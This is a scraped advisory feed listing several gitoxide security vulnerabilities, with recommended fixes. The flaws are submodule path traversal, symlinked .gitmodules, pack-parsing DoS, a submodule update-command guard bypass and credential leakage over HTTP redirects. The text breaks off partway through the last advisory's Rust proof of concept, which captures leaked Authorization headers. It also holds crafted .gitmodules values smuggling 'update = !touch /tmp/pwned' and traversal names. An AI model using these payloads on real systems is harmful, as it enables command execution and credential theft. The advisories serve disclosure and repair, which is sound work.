## **Summary** attachments: [pocs.zip](https://github.com/user-attachments/files/26431422/pocs.zip) Submodule names coming from `.gitmodules` are exposed as unvalidated names and are later reused to derive the submodule git directory as: ``` <superproject common_dir>/modules/<submodule name> ``` Because the submodule name is joined directly as a filesystem path component, a name such as `../../../escaped-target.git` escapes `.git/modules` after normalization. The current implementation then uses that escaped path in both `state()` and `open()`. The updated PoC demonstrates the real sink, not just string construction: - `state()` reports `repository_exists=true` for the traversed path; - `open()` returns a repository whose normalized `common_dir()` matches the attacker-chosen repository outside `.git/modules`. ## **Root cause analysis** The relevant flow is: 1. [`gix-submodule/src/access.rs`](https://github.com/GitoxideLabs/gitoxide/blob/v0.52.0/gix-submodule/src/access.rs) exposes unvalidated submodule names from configuration. 2. [`gix/src/submodule/mod.rs`](https://github.com/GitoxideLabs/gitoxide/blob/v0.52.0/gix/src/submodule/mod.rs) derives the git directory by doing `common_dir().join("modules").join(name)` with no confinement check. 3. [`gix/src/submodule/mod.rs`](https://github.com/GitoxideLabs/gitoxide/blob/v0.52.0/gix/src/submodule/mod.rs) uses that derived path during state resolution and repository opening. There is no normalization-and-confinement step between “submodule name from configuration” and “filesystem path used for repository existence checks / open.” As a result, traversal segments in the submodule name directly influence which repository path is inspected and opened. ## **Reproduce steps** Use the attached PoC zip that contains the `pocs/` workspace. 1. Unzip the PoC archive. 2. Enter `pocs/F002`. 3. Run: ``` cargo run --quiet ``` 4. Compare the output with `pocs/F002/result.txt`. Key outputs are: - `submodule_name=../../../escaped-target.git` - `derived_git_dir_raw=.../.git/modules/../../../escaped-target.git` - `derived_git_dir_normalized=.../artifacts/escaped-target.git` - `escaped_target=.../artifacts/escaped-target.git` - `repository_exists=true` - `submodule_opened=true` - `opened_common_dir_normalized=.../artifacts/escaped-target.git` - `normalized_git_dir_matches_target=true` - `opened_common_dir_matches_target=true` - `target_outside_modules_root=true` These outputs show that gitoxide is not only constructing a traversable path string. It is actually using the escaped path for repository existence checks and for opening a repository object. ## **Impact** Confirmed impact: - a malicious submodule name can redirect submodule state inspection away from `.git/modules/<name>` to an attacker-chosen repository path outside `.git/modules`; - `Submodule::state()` can report repository existence for the wrong repository; - `Submodule::open()` can return a repository object backed by that attacker-chosen path. This is best described as a path-traversal / repository-confusion issue in submodule repository resolution. This report does **not** claim command execution from this behavior alone. The demonstrated impact is repository redirection: callers that enumerate, inspect, or operate on submodules can be steered into using the wrong repository. ## **Recommended fix** Two complementary fixes are advisable: 1. do not reuse raw submodule names as filesystem path fragments; - either use a validated/sanitized name for filesystem derivation, - or derive the storage path from a safe identifier instead of the user-controlled name; 2. add an explicit confinement check after path derivation; - normalize or canonicalize the candidate path, - verify that the result stays under `<common_dir>/modules`, - reject names that contain traversal segments, path separators, or any representation that can escape the modules root. In short, submodule names may remain opaque configuration identifiers, but they should not be treated as trusted filesystem subpaths.

الإصدارات المتأثرة

All versions < 0.52.1

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P

عالية
📦 gitoxide 📌 All versions < 0.52.1 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ## Summary attachments: [pocs.zip](https://github.com/user-attachments/files/26431422/pocs.zip) When `Repository::submodules()` loads submodule metadata, it prefers the worktree `.gitmodules` file if that path exists. In the current implementation, the path is read with `std::f...
📅 2026-05-05 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

## Summary attachments: [pocs.zip](https://github.com/user-attachments/files/26431422/pocs.zip) When `Repository::submodules()` loads submodule metadata, it prefers the worktree `.gitmodules` file if that path exists. In the current implementation, the path is read with `std::fs::read()`, which follows symlinks. As a result, a repository can present a symlinked `.gitmodules` that points outside the repository, and gitoxide will parse the out-of-repository bytes as submodule configuration. This is a repository-boundary violation. A caller using the high-level submodule API can believe it is reading repository-local submodule metadata, while the bytes are actually coming from an arbitrary file outside the repository tree. ## Root cause analysis The relevant flow is: 1. [`gix/src/repository/location.rs`](https://github.com/GitoxideLabs/gitoxide/blob/v0.52.0/gix/src/repository/location.rs) derives the worktree `.gitmodules` path as `workdir/.gitmodules`. 2. [`gix/src/repository/submodule.rs`](https://github.com/GitoxideLabs/gitoxide/blob/v0.52.0/gix/src/repository/submodule.rs) reads that path with `std::fs::read(&path)` and immediately parses the bytes as a submodule configuration file. 3. `Repository::submodules()` exposes the parsed entries through the high-level API. The issue is not in the parser. The issue is that the worktree path is treated as an ordinary file without checking whether it is a symlink, and without checking whether the canonicalized target remains inside the repository worktree. Because `std::fs::read()` follows symlinks, a malicious repository can cause gitoxide to ingest bytes from an attacker-chosen location outside the repository. The resulting `Submodule` objects then expose `name`, `path`, and `url` values derived from that external file. ## Reproduction steps Use the attached PoC zip that contains the `pocs/` workspace. 1. Unzip the PoC archive. 2. Enter `pocs/F001`. 3. Run: ```bash cargo run --quiet ``` 4. Compare the output with `pocs/F001/result.txt`. Important outputs include: - `gitmodules_symlink=.../victim-repo/.gitmodules` - `symlink_target=.../outside/modules.conf` - `parsed_name=symlinked` - `parsed_path=deps/symlinked` - `parsed_url=https://attacker.example/symlinked.git` These outputs show that gitoxide parsed the submodule configuration from the symlink target outside the repository, not from repository-local bytes. ## Impact Confirmed impact: - out-of-repository bytes can be injected into the result of `Repository::submodules()`; - callers can be misled about submodule metadata such as `name`, `path`, and `url`; - any downstream workflow that uses those values to decide clone, fetch, update, or policy behavior is operating on attacker-controlled data that did not actually originate from the repository tree. This report does **not** claim direct command execution from this code path by itself. The demonstrated impact is metadata injection across the repository boundary. ## Recommended fix A safe fix is to stop silently following symlinks for the worktree `.gitmodules` path in this loading path. Reasonable options include: 1. use `symlink_metadata()` / `lstat`style checks and reject symlinked `.gitmodules` when loading from the worktree; 2. canonicalize the target and verify that it still resides under the repository worktree before reading it; 3. for security-sensitive callers, prefer loading `.gitmodules` from the index or `HEAD` tree rather than following the worktree path. At minimum, the worktree path should not silently follow symlinks to arbitrary external files.

الإصدارات المتأثرة

All versions < 0.52.1

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P

عالية
📦 gix-pack 📌 All versions < 0.69.0 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Summary Multiple denial-of-service vectors in `gix-pack`: unchecked array indexing causes panics on crafted delta data, and uncapped attacker-controlled size headers enable OOM process kills. Both are triggered by malicious pack data received during clone/fetch. ### Details...
📅 2026-05-05 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

### Summary Multiple denial-of-service vectors in `gix-pack`: unchecked array indexing causes panics on crafted delta data, and uncapped attacker-controlled size headers enable OOM process kills. Both are triggered by malicious pack data received during clone/fetch. ### Details **Bug 1: Unchecked array indexing in delta application (CWE-248)** The `apply()` function in `gix-pack/src/data/delta.rs` (lines 33-87) reads delta instructions using unchecked `data[i]` indexing at 7 locations (lines 41, 45, 49, 53, 57, 61, 65). The command byte's bits indicate how many additional bytes follow, but if the delta data is truncated, the index panics: ```rust pub(crate) fn apply(base: &[u8], mut target: &mut [u8], data: &[u8]) -> Result<(), apply::Error> { let mut i = 0; while let Some(cmd) = data.get(i) { // first byte: safely checked i += 1; match cmd { cmd if cmd & 0b1000_0000 != 0 => { let (mut ofs, mut size): (u32, u32) = (0, 0); if cmd & 0b0000_0001 != 0 { ofs = u32::from(data[i]); // PANIC: no bounds check i += 1; } // ... 6 more unchecked data[i] at lines 45, 49, 53, 57, 61, 65 ``` Lines 83-84 use `assert_eq!` (not `debug_assert_eq!`) that panics in both debug and release builds: ```rust assert_eq!(i, data.len()); assert_eq!(target.len(), 0); ``` A second location in `parse_header_info()` (`gix-pack/src/data/entry/decode.rs:116-129`) also panics on truncated input via unchecked `data[0]` and `data[i]`. Note: PR #2059 (merged 2025-06-25) fixed the explicit `panic!()` for command code 0. The unchecked array indexing is a distinct class that remains unfixed. **Bug 2: Uncapped allocation from attacker-controlled size headers (CWE-770)** Pack entry headers and delta headers encode object sizes as LEB128-encoded u64 values. These sizes are used to allocate buffers before validating the actual data, with no upper bound: ``` bytes_to_entries.rs:109 Vec::with_capacity(entry.decompressed_size as usize) // UNCAPPED resolve.rs:461 out.resize(decompressed_len, 0) // UNCAPPED resolve.rs:190 fully_resolved_delta_bytes.resize(result_size as usize, 0) // UNCAPPED ``` A 10-byte crafted pack entry can claim `decompressed_size = 0xFFFFFFFFFFFF` (281 TB). At `bytes_to_entries.rs:109`, gitoxide calls `Vec::with_capacity(281TB)` **before any decompression occurs**. The OS immediately OOM-kills the process. No `MAX_SIZE`, `max_object_size`, or equivalent limit exists anywhere in gix-pack. The allocation at `resolve.rs:461` is equally dangerous: `decompressed_size` from the pack header is cast to `usize` and passed to `Vec::resize()`, which allocates and zeroes the full claimed size before the zlib decompressor runs. ### PoC Compiled and executed in Rust 1.94.1 `--release` mode. All 5 panics confirmed: ``` [1] delta apply: cmd=0x81, truncated -> PANIC: index out of bounds: len is 1 but index is 1 [2] delta apply: cmd=0xFF, only 3 extra bytes -> PANIC: index out of bounds: len is 4 but index is 4 [3] parse_header_info: empty data -> PANIC: index out of bounds: len is 0 but index is 0 [4] parse_header_info: byte=0x80, truncated -> PANIC: index out of bounds: len is 1 but index is 1 [5] delta apply: assert_eq!(i, data.len()) -> PANIC: assertion failed ``` For the OOM vector: the allocation path is `parse_header_info()` -> `entry.decompressed_size` (u64) -> `Vec::with_capacity(size as usize)` with no intermediate validation. A minimal pack with a single entry claiming a multi-terabyte size triggers immediate process kill. ### Impact Any application built on gitoxide that clones or fetches from an untrusted remote can be crashed by a malicious server: - **Panic DoS**: 1-2 bytes of crafted delta data causes an immediate process abort - **OOM DoS**: A single crafted pack entry header causes the process to attempt a multi-terabyte allocation, triggering an immediate OOM kill by the OS This affects the `gix` CLI, any application using the `gix` crate, and CI/CD systems that clone repositories using gitoxide. No fuzz targets exist for gix-pack (issue #703 tracks oss-fuzz integration). ### Suggested fix For panics: replace unchecked `data[i]` with `data.get(i).ok_or(Error::...)` and replace `assert_eq!` with proper error returns. For OOM: add a configurable maximum object size (similar to git's `transfer.maxPackSize`) and validate claimed sizes against it before allocating. At minimum, cap allocations to a reasonable default (e.g., 4 GB) and use `try_reserve()` consistently. ### Severity High. Network vector, no privileges required, user interaction required (clone/fetch). The OOM vector is a single-packet process kill with no recovery.

الإصدارات المتأثرة

All versions < 0.69.0

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

عالية
📦 gix 📌 All versions < 0.83.0 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 محلي ⚪ لم تُستغل 🟢 ترقيع
💬 ### Summary [`gix_submodule::File::update()`](https://github.com/GitoxideLabs/gitoxide/blob/main/gix-submodule/src/access.rs#L168) is the API that gates whether an attacker-supplied `.gitmodules` file may set `update = !<shell command>`. The function is designed to return `Err(C...
📅 2026-05-05 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

### Summary [`gix_submodule::File::update()`](https://github.com/GitoxideLabs/gitoxide/blob/main/gix-submodule/src/access.rs#L168) is the API that gates whether an attacker-supplied `.gitmodules` file may set `update = !<shell command>`. The function is designed to return `Err(CommandForbiddenInModulesConfiguration)` unless the `!command` value came from a trusted local source (`.git/config`). Git CVE [CVE-2019-19604](https://nvd.nist.gov/vuln/detail/cve-2019-19604) illustrates why this check is necessary. However, the guard is implemented incorrectly: it checks whether any section with the same submodule name exists from a non-`.gitmodules` source; it does not verify that the `update` value came from that section. Once a submodule has been initialized (any workflow that writes `submodule.<name>.url` to `.git/config`), and the attacker subsequently adds `update = !cmd` to `.gitmodules`, the guard passes while the command value falls through to the attacker-controlled file. On an identical repository state, `git submodule update` aborts with `fatal: invalid value for 'submodule.sub.update'`, while `gix::Submodule::update()` returns `Ok(Some(Update::Command("touch /tmp/pwned")))`. The vulnerable code was introduced in https://github.com/GitoxideLabs/gitoxide/commit/6a2e6a436f76c8bbf2487f9967413a51356667a0. ### Details The vulnerable method is `gix_submodule::File::update`: https://github.com/GitoxideLabs/gitoxide/blob/main/gix-submodule/src/access.rs#L168-L193: ```rust pub fn update(&self, name: &BStr) -> Result<Option<Update>, config::update::Error> { let value: Update = match self.config.string(format!("submodule.{name}.update")) { // ^^^^^^^^^^^^^^^^^^ // [A] Reads the value. gix_config::File::string() iterates sections // newest-to-oldest; if the override section lacks `update`, it // falls through to .gitmodules and returns the attacker value. // // https://github.com/GitoxideLabs/gitoxide/blob/main/gix-config/src/file/access/raw.rs#L76 Some(v) => v.as_ref().try_into().map_err(|()| config::update::Error::Invalid { submodule: name.to_owned(), actual: v.into_owned(), })?, None => return Ok(None), }; if let Update::Command(cmd) = &value { let ours = self.config.meta(); let has_value_from_foreign_section = self .config .sections_by_name("submodule") .into_iter() .flatten() .any(|s| s.header().subsection_name() == Some(name) && !std::ptr::eq(s.meta(), ours)); // ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ // [B] Checks only that SOME section with this name exists from a // non-.gitmodules source. Does NOT check where [A]'s value // came from. if !has_value_from_foreign_section { return Err(config::update::Error::CommandForbiddenInModulesConfiguration { ... }); } } Ok(Some(value)) } ``` ### PoC `git submodule init` copies `submodule.$name.url` and writes `active = true` into `.git/config` ([`init_submodule()`, builtin/submodule--helper.c:438-517](https://github.com/git/git/blob/v2.53.0/builtin/submodule--helper.c#L438-L517)). It does not unconditionally copy `update`. Since CVE-2019-19604, `git` rejects `.gitmodules` files that contain `update = !cmd` at parse time. However, `init` is a one-time operation - once the `.git/config` section exists, subsequent changes to `.gitmodules` are not re-inited. So, the attack sequence is: 1. Attacker's repo ships a benign `.gitmodules` (no `update` key). 2. Victim clones and runs `git submodule init` -> `.git/config` contains: ```ini [submodule "sub"] active = true url = /tmp/sub-origin ``` 3. Attacker pushes a new commit adding `update = !cmd` to `.gitmodules`. 4. Victim runs `git pull` -> `.gitmodules` now contains: ```ini [submodule "sub"] path = sub url = /tmp/sub-origin update = !touch /tmp/pwned ``` while `.git/config` is unchanged. This is the precise state that bypasses gitoxide's guard: - The .git/config entry - even though it contains only url and active - causes [`append_submodule_overrides`](https://github.com/GitoxideLabs/gitoxide/blob/dd5c18d9e526e8de462fa40aa047acd097cfa7dc/gix-submodule/src/lib.rs#L41) to create an override section. That section has foreign (non-.gitmodules) metadata, so the existence check at [B] returns true and the guard is disarmed. - However, because that override section has no update key, the value lookup at [A] skips past it and falls through to the .gitmodules section, returning the attacker's !touch /tmp/pwned. The bug is the mismatch between what [A] and [B] actually inspect: [A] asks "which section provides the update value?" (answer: .gitmodules), while [B] asks "does any trusted section exist for this submodule?" (answer: yes). A correct guard would ask the same question as [A]. Git itself would refuse to operate on this repository at the next `git submodule update`. The vulnerability is in gitoxide-based consumers that call `Submodule::update()` and trust its output. ### Option 1: Unit test (verified - passes, confirming the bug) Drop into `gix-submodule/tests/file/mod.rs` inside `mod update`: ```rust #[test] fn security_bypass_via_partial_override() { use std::str::FromStr; // Attacker-controlled .gitmodules let gitmodules = "[submodule.a]\n url = https://example.com/a\n update = !touch /tmp/pwned"; // Post-`git submodule init` state: only `url` copied to .git/config let repo_config = gix_config::File::from_str("[submodule.a]\n url = https://example.com/a").unwrap(); let module = gix_submodule::File::from_bytes(gitmodules.as_bytes(), None, &repo_config).unwrap(); let result = module.update("a".into()); // VULNERABLE: prints `Ok(Some(Command("touch /tmp/pwned")))` // SECURE: should be `Err(CommandForbiddenInModulesConfiguration { .. })` eprintln!("{:?}", result); } ``` ```console $ cargo test -p gix-submodule security_bypass -- --nocapture running 1 test bypass result: Ok(Some(Command("touch /tmp/pwned"))) test file::update::security_bypass_via_partial_override ... ok ``` ### Option 2: End-to-end - git refuses, gitoxide accepts Verified with **git 2.51.2** and **gix @ `dd5c18d9e`**. ```bash #!/bin/bash set -e cd /tmp rm -rf evil-repo victim sub-origin 2>/dev/null || true # --- Setup --- mkdir sub-origin && cd sub-origin git init -q && git commit -q --allow-empty -m init cd /tmp # --- [1] Attacker creates repo with BENIGN submodule --- mkdir evil-repo && cd evil-repo git init -q git -c protocol.file.allow=always submodule add /tmp/sub-origin sub git commit -q -m "add submodule (benign)" cd /tmp # --- [2] Victim clones and inits (passes git's .gitmodules validation) --- git -c protocol.file.allow=always clone -q /tmp/evil-repo victim cd victim git submodule init # .git/config now has: [submodule "sub"] active=true, url=..., NO update key cd /tmp # --- [3] Attacker adds malicious update to .gitmodules --- cd evil-repo cat >> .gitmodules <<'EOF' update = !touch /tmp/pwned EOF git commit -q -am "add malicious update" cd /tmp # --- [4] Victim pulls --- cd victim git pull -q ``` Final state: ``` --- .gitmodules: [submodule "sub"] path = sub url = /tmp/sub-origin update = !touch /tmp/pwned --- .git/config (submodule section): [submodule "sub"] active = true url = /tmp/sub-origin ``` **Upstream git on this state:** ```console $ cd /tmp/victim && git submodule update fatal: invalid value for 'submodule.sub.update' $ echo $? 128 $ test -f /tmp/pwned && echo VULNERABLE || echo SAFE SAFE ``` **Gitoxide on the same state:** ```rust // /tmp/gix-repro/main.rs let repo = gix::open("/tmp/victim")?; for sm in repo.submodules()?.expect("submodules present") { println!("{}: {:?}", sm.name(), sm.update()); } ``` ```console $ cargo run sub: Ok(Some(Command("touch /tmp/pwned"))) ``` The `CommandForbiddenInModulesConfiguration` guard never fires. ### Impact ### Direct Any downstream code built on `gix` that: 1. Calls `Submodule::update()` to determine the update strategy, and 2. Trusts that `Update::Command(_)` is safe to execute (because `CommandForbiddenInModulesConfiguration` exists as the documented guard) …will execute attacker-controlled shell commands on `submodule update` against a previously-initialized submodule. `gix` itself does not currently ship a `submodule update` implementation, so there is no RCE in the `gix` CLI today. However: - The `Submodule::update()` API is public at `gix/src/submodule/mod.rs:108` and delegates directly to the vulnerable function. - The error variant name (`CommandForbiddenInModulesConfiguration`) and test suite (`valid_in_overrides` at `gix-submodule/tests/file/mod.rs:272`) explicitly document this as the security boundary. - Any third-party tool, IDE plugin, or CI integration building submodule-update on top of `gix` inherits this vulnerability. ### Indirect / second-order - CI/forge integrations that auto-init submodules and then query the update mode - Editor/IDE extensions using `gix` for submodule info - Gitoxide-based `init` equivalents - any tool that implements its own init (writing `url` to local config) creates the bypass state without needing the pull-after-init sequence

الإصدارات المتأثرة

All versions < 0.83.0

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

عالية
📦 gix 📌 All versions < 0.83.0 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Summary Submodule name validation bypass plus missing validation in production code paths allows path traversal via crafted `.gitmodules`. Combined with a trust inheritance flaw in `Submodule::open()`, this enables reading arbitrary git repository configs (including credenti...
📅 2026-05-05 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

### Summary Submodule name validation bypass plus missing validation in production code paths allows path traversal via crafted `.gitmodules`. Combined with a trust inheritance flaw in `Submodule::open()`, this enables reading arbitrary git repository configs (including credentials) from traversed paths with full trust (CWE-22, CWE-200). ### Details **Bug 1: Validation bypass in `gix-validate/src/submodule.rs` (lines 27-42)** The `name()` function uses `name.find(b"..")` which returns only the FIRST occurrence. If the first `..` is embedded in a non-traversal context, the function returns `Ok` without checking subsequent `../` sequences: ```rust pub fn name(name: &BStr) -> Result<&BStr, name::Error> { match name.find(b"..") { Some(pos) => { let &b = name.get(pos + 2).ok_or(name::Error::ParentComponent)?; if b == b'/' || b == b'\\' { Err(name::Error::ParentComponent) } else { Ok(name) // Returns Ok without checking rest of string } } None => Ok(name), } } ``` Bypass: `a..b/../../../.git/` passes because `find(b"..")` returns position 1 (the `..` in `a..b`), checks `name[3] == b'b'`, and returns Ok. The real `/../../../` is never checked. **Bug 2: Validation never called in production** `gix_validate::submodule::name()` has zero production callers (only test code). The `names()` iterator in `gix-submodule/src/access.rs:29` explicitly documents it returns "unvalidated names." `git_dir()` at `gix/src/submodule/mod.rs:198-204` constructs filesystem paths from raw names: ```rust pub fn git_dir(&self) -> PathBuf { self.state.repo.common_dir().join("modules").join(gix_path::from_bstr(self.name())) } ``` **Bug 3: Trust inheritance bypass in `Submodule::open()`** At `gix/src/submodule/mod.rs:270`, `open()` clones the parent repository's options: ```rust match crate::open_opts(self.git_dir_try_old_form()?, self.state.repo.options.clone()) { ``` The parent's `options.git_dir_trust` is `Some(Trust::Full)`. At `gix/src/open/repository.rs:103-104`: ```rust if options.git_dir_trust.is_none() { options.git_dir_trust = gix_sec::Trust::from_path_ownership(&git_dir)?.into(); } ``` Since trust is already `Some(Full)`, the ownership check is **skipped entirely**. The traversed path is opened with `Trust::Full` regardless of ownership, bypassing gitoxide's safe-directory protections. ### PoC Compiled and executed in Rust 1.94.1 `--release` mode. All bypass cases confirmed: ``` BYPASS a..b/../../../.git/ -> PASSED validation git_dir = .git/modules/a..b/../../../.git/ normalized = .git/ (parent repo!) BYPASS x..y/../../../.git/config -> PASSED validation git_dir = .git/modules/x..y/../../../.git/config normalized = .git/config ``` ### Attack chain 1. Attacker crafts a repository with `.gitmodules`: ```ini [submodule "x..y/../../.."] path = innocent url = https://attacker.com/repo.git ``` 2. Victim clones the repository using a tool built on gitoxide. 3. When the tool iterates submodules and calls `submodule.open()` or `submodule.status()`: - `git_dir()` returns `.git/modules/x..y/../../..` which resolves to the parent `.git/` - `open_opts()` is called with `Trust::Full` (inherited from parent, ownership check skipped) - The parent's `.git/config` is fully parsed 4. The returned `Repository` object exposes all config values from the traversed path: - `remote.origin.url` (may contain `https://user:token@github.com/...`) - `http.extraHeader` (often `Authorization: Bearer <token>`) - `credential.*` sections - `core.sshCommand` 5. Accessible via standard API: `repo.config_snapshot().string("http.extraHeader")`, `repo.find_remote("origin")`, etc. ### Impact A crafted `.gitmodules` in a malicious repository causes gitoxide to open arbitrary git directories as submodule repositories with full trust, exposing their configuration including credentials. This is the same class of vulnerability as GHSA-7w47-3wg8-547c (path traversal), but through the submodule name vector with an additional trust bypass. The trust inheritance is the critical amplifier: without it, the traversed path would undergo ownership checks that could block the attack. With it, any git directory reachable via `../` is opened with full trust. ### Honest limitations - The traversed path must be a valid git directory (HEAD, objects/, refs/ must exist) - The victim's tool must call `open()` or `status()` on submodules (tools that only list submodules are not affected) - Credential exposure requires the target config to contain embedded credentials - Submodule operations currently require explicit user action ### Suggested fix 1. Fix the validation to check ALL `..` occurrences (iterate, not single `find`) 2. Call `gix_validate::submodule::name()` in `git_dir()` before constructing the path 3. Do NOT inherit `git_dir_trust` from parent when opening submodule repos -- always re-derive trust from path ownership ### Severity High. Network vector (via clone), requires user interaction (submodule operations). The trust bypass enables credential disclosure from traversed git directories. Confidentiality impact is high.

الإصدارات المتأثرة

All versions < 0.83.0

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

غير محدد
📦 gix-transport 📌 All versions < 0.56.0 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ## Summary The curl-based HTTP transport in `gix-transport` sends user credentials (passwords, tokens) to an attacker-controlled server after an HTTP redirect. When a server responds with a 302 redirect during the initial `GET /info/refs`, gitoxide records the redirected base UR...
📅 2026-05-05 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

## Summary The curl-based HTTP transport in `gix-transport` sends user credentials (passwords, tokens) to an attacker-controlled server after an HTTP redirect. When a server responds with a 302 redirect during the initial `GET /info/refs`, gitoxide records the redirected base URL and rewrites all subsequent requests to point at the redirected host. The `Authorization` header is still attached because `add_basic_auth_if_present()` only checks `self.url` (the original, never-updated URL). The reqwest backend is not affected. Its custom redirect policy at `reqwest/remote.rs` lines 60-64 compares `prev_url.host_str()` to `curr_url.host_str()` and calls `attempt.stop()` on cross-domain redirects, so `redirected_base_url` is never set to a different host. ## Details The vulnerability involves two components in `gix-transport`: **1. URL rewriting after redirect** ([gix-transport/src/client/blocking_io/http/curl/remote.rs](https://github.com/GitoxideLabs/gitoxide/blob/main/gix-transport/src/client/blocking_io/http/curl/remote.rs)) After a request completes, the effective URL is compared to the requested URL. If they differ (redirect occurred), the new base URL is stored (lines 355-359). On subsequent requests, `swap_tails()` rewrites the target URL to point at the redirected host (line 166). **2. Credential check uses original URL** ([gix-transport/src/client/blocking_io/http/mod.rs, lines 293-312](https://github.com/GitoxideLabs/gitoxide/blob/main/gix-transport/src/client/blocking_io/http/mod.rs#L293)) `add_basic_auth_if_present()` checks `self.url` (set once during construction, never mutated) to decide whether to attach credentials. Since `self.url` always points to the original host, credentials are approved even when the actual request goes to the redirected (attacker) host. The `Authorization` header is added to the headers list in `handshake()` (line 374) and `request()` (line 434) before being passed to the backend, which applies them to the rewritten URL via `handle.http_headers(headers)` (line 309). ### Attack flow: cross-domain credential leak 1. Victim clones `https://legitimate.com/repo` with credentials configured 2. Server returns 302 redirect on `GET /info/refs` to `https://attacker.com/...` 3. Curl follows the redirect and strips `Authorization` for this GET (safe so far) 4. Attacker serves a valid info/refs response; `redirected_base_url` is set 5. `POST /git-upload-pack` is rewritten via `swap_tails()` to `attacker.com` 6. `add_basic_auth_if_present()` checks `self.url` (still `legitimate.com`), approves credential sending 7. `Authorization: Basic <credentials>` is sent to `attacker.com` Curl's cross-domain header stripping only protects the redirected GET. It does not protect the POST, which is a new request with credentials re-attached by gitoxide. ### Secondary vector: HTTPS-to-HTTP downgrade The cleartext protection at `mod.rs` line 300-305 also checks `self.url`: ```rust if self.url.starts_with("http://") { return Err(client::Error::AuthenticationRefused("...")); } ``` This only validates the original URL's scheme, not the effective URL after redirect. A redirect from `https://legitimate.com` to `http://attacker.com` bypasses this check, causing credentials to be sent in cleartext over HTTP. 1. Victim clones `https://legitimate.com/repo` with credentials 2. Server redirects to `http://attacker.com/...` (note: HTTP, not HTTPS) 3. `add_basic_auth_if_present()` checks `self.url` (still `https://`), allows credentials 4. `Authorization` header is sent over unencrypted HTTP to `attacker.com` ## PoC A complete Rust project that reproduces the issue. It starts two local TCP servers (legitimate on :8080, attacker on :9090) and uses `gix-transport` to demonstrate the credential leak. **To run:** Create the project next to the gitoxide checkout so path dependencies resolve, then `cargo run`. <details> <summary>Cargo.toml</summary> ```toml [package] name = "poc-gitoxide-redirect" version = "0.1.0" edition = "2021" [dependencies] # http-client-insecure-credentials is only needed because the PoC uses http:// # to avoid TLS setup. A real attack would use https:// and not require this feature. gix-transport = { path = "../gitoxide/gix-transport", features = ["http-client-curl", "http-client-insecure-credentials"] } gix-sec = { path = "../gitoxide/gix-sec" } gix-url = { path = "../gitoxide/gix-url" } gix-packetline = { path = "../gitoxide/gix-packetline", features = ["blocking-io"] } ``` </details> <details> <summary>src/main.rs</summary> ```rust use std::io::{BufRead, BufReader, Write}; use std::net::TcpListener; use std::sync::mpsc; use std::thread; use gix_transport::client::{self, blocking_io::http, blocking_io::Transport, TransportWithoutIO}; fn main() { println!("=== gitoxide HTTP credential leak via redirect ===\n"); let (captured_tx, captured_rx) = mpsc::channel::<Vec<String>>(); // Attacker server (port 9090): captures credentials let attacker = TcpListener::bind("127.0.0.1:9090").expect("bind attacker"); let attacker_handle = thread::spawn(move || { let (mut conn1, _) = attacker.accept().expect("accept conn1"); let mut reader1 = BufReader::new(conn1.try_clone().unwrap()); let mut headers1 = Vec::new(); loop { let mut line = String::new(); reader1.read_line(&mut line).unwrap(); if line.trim().is_empty() { break; } headers1.push(line.trim().to_string()); } println!("[attacker] GET /info/refs headers (from redirect):"); for h in &headers1 { println!(" {h}"); } let pkt_service = "001e# service=git-upload-pack\n"; let pkt_flush = "0000"; let fake_hash = "a".repeat(40); let caps = "multi_ack thin-pack side-band side-band-64k ofs-delta shallow no-progress include-tag"; let ref_line = format!("{fake_hash} HEAD\0{caps}\n"); let ref_pkt = format!("{:04x}{ref_line}", ref_line.len() + 4); let body = format!("{pkt_service}{pkt_flush}{ref_pkt}{pkt_flush}"); let response = format!( "HTTP/1.1 200 OK\r\nContent-Type: application/x-git-upload-pack-advertisement\r\nContent-Length: {}\r\nConnection: close\r\n\r\n{body}", body.len() ); conn1.write_all(response.as_bytes()).unwrap(); conn1.flush().unwrap(); drop(conn1); let (mut conn2, _) = attacker.accept().expect("accept conn2"); let mut reader2 = BufReader::new(conn2.try_clone().unwrap()); let mut headers2 = Vec::new(); let mut content_length: usize = 0; loop { let mut line = String::new(); reader2.read_line(&mut line).unwrap(); if line.trim().is_empty() { break; } let trimmed = line.trim().to_string(); if let Some(cl) = trimmed.strip_prefix("Content-Length: ") { content_length = cl.parse().unwrap_or(0); } headers2.push(trimmed); } if content_length > 0 { let mut body_buf = vec![0u8; content_length]; use std::io::Read; reader2.read_exact(&mut body_buf).ok(); } println!("\n[attacker] POST /git-upload-pack headers:"); for h in &headers2 { let prefix = if h.starts_with("Authorization:") { " >>> LEAKED: " } else { " " }; println!("{prefix}{h}"); } let resp_body = "0000"; let response2 = format!( "HTTP/1.1 200 OK\r\nContent-Type: application/x-git-upload-pack-result\r\nContent-Length: {}\r\nConnection: close\r\n\r\n{resp_body}", resp_body.len() ); conn2.write_all(response2.as_bytes()).unwrap(); conn2.flush().unwrap(); drop(conn2); captured_tx.send(headers2).ok(); }); // Legitimate server (port 8080): redirects to attacker let legit = TcpListener::bind("127.0.0.1:8080").expect("bind legit"); let 